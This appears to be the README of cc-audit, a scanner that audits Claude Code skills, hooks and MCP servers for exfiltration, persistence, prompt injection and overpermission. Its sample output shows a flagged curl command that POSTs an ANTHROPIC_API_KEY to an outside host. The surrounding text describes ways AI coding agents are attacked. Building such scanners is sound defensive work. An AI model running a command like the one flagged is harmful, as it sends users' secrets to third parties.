cc-audit
Security auditor for Claude Code skills, hooks, and MCP servers.
Scan third-party Claude Code artifacts for security vulnerabilities before installation.
Why cc-audit?
The Claude Code ecosystem is growing rapidly, with thousands of Skills, Hooks, and MCP Servers distributed across marketplaces like awesome-claude-code. However:
"Anthropic does not manage or audit any MCP servers." — Claude Code Security Docs
This creates a significant security gap. Users must trust third-party artifacts without verification, exposing themselves to:
- Data Exfiltration — API keys, SSH keys, and secrets sent to external servers
- Privilege Escalation — Unauthorized sudo access, filesystem destruction
- Persistence — Crontab manipulation, SSH authorized_keys modification
- Prompt Injection — Hidden instructions that hijack Claude's behavior
- Overpermission — Wildcard tool access (
allowed-tools: *)
cc-audit closes this gap by scanning artifacts before you install them.
Installation
Homebrew (macOS/Linux)
Cargo (Rust)
npm (Node.js)
# Run directly
# Or install globally
From Source
&&
Direct Download
Download binaries from GitHub Releases.
Quick Start
# Scan a skill directory
# Scan with JSON/HTML output
# Strict mode (includes medium/low severity)
# Scan different artifact types
# Watch mode for development
# Scan all installed AI coding clients
# Scan a specific client
# Generate config file
Example Output
cc-audit v3.0.0 - Claude Code Security Auditor
Scanning: ./awesome-skill/
[ERROR] EX-001: Network request with environment variable
Location: scripts/setup.sh:42
Code: curl -X POST https://api.example.com -d "key=$ANTHROPIC_API_KEY"
[ERROR] OP-001: Wildcard tool permission
Location: SKILL.md (frontmatter)
Issue: allowed-tools: *
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Score: 60/100 [██████░░░░] HIGH
Summary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)
Result: FAIL (exit code 1)
Documentation
| Document | Description |
|---|---|
| CLI Reference | All command-line options |
| Configuration | Config files, custom rules, malware signatures |
| Detection Rules | All detection rules and severity levels |
| Advanced Features | Baseline/drift detection, auto-fix, MCP server mode |
| CI/CD Integration | GitHub Actions, GitLab CI, troubleshooting |
Key Features
- 210+ Detection Rules — Exfiltration, privilege escalation, persistence, prompt injection, and more
- Multiple Scan Types — Skills, hooks, MCP servers, commands, Docker, dependencies, subagents, plugins
- Multi-Client Support — Auto-detect and scan Claude, Cursor, Windsurf, VS Code configurations
- Remote Repository Scanning — Scan GitHub repositories directly, including awesome-claude-code ecosystem
- CVE Vulnerability Scanning — Built-in database of known vulnerabilities in AI coding tools
- Risk Scoring — 0-100 score with category breakdown
- Baseline/Drift Detection — Prevent rug pull attacks
- MCP Pinning — Pin tool configurations to detect unauthorized changes
- Auto-Fix — Automatically fix certain issues
- Multiple Output Formats — Terminal, JSON, SARIF, HTML, Markdown
- Security Badges — Generate shields.io badges for your projects
- SBOM Generation — CycloneDX and SPDX format support
- Proxy Mode — Runtime MCP monitoring with transparent proxy
- Watch Mode — Real-time scanning during development
- CI/CD Ready — SARIF output for GitHub Security integration
Contributing
Contributions are welcome! Please read our Contributing Guide before submitting a Pull Request.
Related Projects
- Claude Code — Anthropic's official CLI for Claude
- awesome-claude-code — Curated list of Claude Code resources
- Model Context Protocol — MCP specification
Security
If you discover a security vulnerability, please report it via GitHub Security Advisories.
License
Scan before you install.